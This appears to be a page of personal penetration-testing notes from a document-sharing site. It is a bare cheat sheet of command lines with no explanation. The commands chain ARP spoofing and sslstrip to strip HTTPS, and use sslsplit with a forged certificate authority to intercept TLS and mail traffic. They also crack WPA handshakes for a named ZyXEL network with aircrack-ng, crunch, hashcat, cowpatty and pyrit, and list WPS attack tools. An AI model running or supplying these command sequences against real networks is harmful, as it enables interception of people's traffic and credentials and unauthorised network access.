You are on page 1of 2

=============

sslstrip
=============
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080
arpspoof -i eth0 -c both -t 192.168.88.1 -r 192.168.88.251
sslstrip -a -l 8080 -w ~/sslstrip.log

=============
sslsplit
=============
sysctl -w net.ipv4.ip_forward=1

iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443

sslsplit -P -D -l connections.log -j ~/sslsplit_res/ -S logdir/ -k


~/certificates/CA/ca.key -c ~/certificates/CA/ca.crt ssl 0.0.0.0 8443

strings * | grep
==============================
wireless
==============================
(eapol || wlan.fc.type_subtype == 0x08) && not malformed

wpaclean zyxel_clean.pcap zyxel-01.cap

===============
aircrack
===============

aircrack-ng ~/wi-fi/zyxel-01.cap
aircrack-ng -w ~/wi-fi/cain_wp.txt -b 40:4A:03:C6:68:84 ~/wi-fi/zyxel-01.cap

aircrack-ng -S

=============
cruch
=============

cruch 4 4 1234567890
crunch 4 4 1234567890 -o ~/wi-fi/crunch/num_4.txt
crunch 4 4 -f ~/wi-fi/crunch/charset.lst numeric -o ~/wi-fi/crunch/num_4.txt

cat /usr/share/rainbowcrack/charset.txt

crunch 4 4 -t @@00 -o ~/wi-fi/crunch/patter_res.txt


crunch 4 4 -t ,000
crunch 4 4 -t %000
crunch 4 4 -t ^000

crunch 13 13 -t zyxel-%%%-@@@
crunch 13 13 -t zyxel-2%%-ty@ | aircrack-ng -b 40:4A:03:C6:68:84 -w- ~/wi-fi/zyxel-
01.cap
============
hashcat
============
hashcat -h

aircrack-ng zyxel_clean.pcap -J zyxel_hashcat

hashcat -m 2500 zyxel_hashcat.hccap cain_wp.txt


hashcat -m 2500 -a 3 zyxel_hashcat.hccap zyxel-?d?d?d-tym

============
cowpatty
============

cowpatty -c -r ~/wi-fi/zyxel-01.cap
cowpatty -f ~/wi-fi/cain.txt -r ~/wi-fi/zyxel-01.cap -s ZyXEL-9172
cowpatty -f ~/wi-fi/cain_wp.txt -r ~/wi-fi/zyxel-01.cap -s ZyXEL-9172

genpmk

cowpatty -d genpmk/genpmk_Zyxel -r zyxel_clean.pcap -s ZyXEL-9172

=====
wps
=====

reaver
wifite

=====
gpu
=====
pyrit benchmark

pyrit -r wi-fi/zyxel-01.cap analyze

pyrit -r wi-fi/zyxel-01.cap -i wi-fi/cain_wp.txt -b 40:4A:03:C6:68:84


attack_passthrough

pyrit –e ZyXEL-9172 create_essid


pyrit -i wi-fi/cain_wp.txt import_passwords
pyrit batch
pyrit -r wi-fi/zyxel-01.cap attack_db

pyrit -e ZyXEL-9172 -o ~/wi-fi/pyrit_to_cowpatty.out export_cowpatty

и наоборот

pyrit -e ZyXEL-9172 delete_essid

============
wi-fi honey
============

You might also like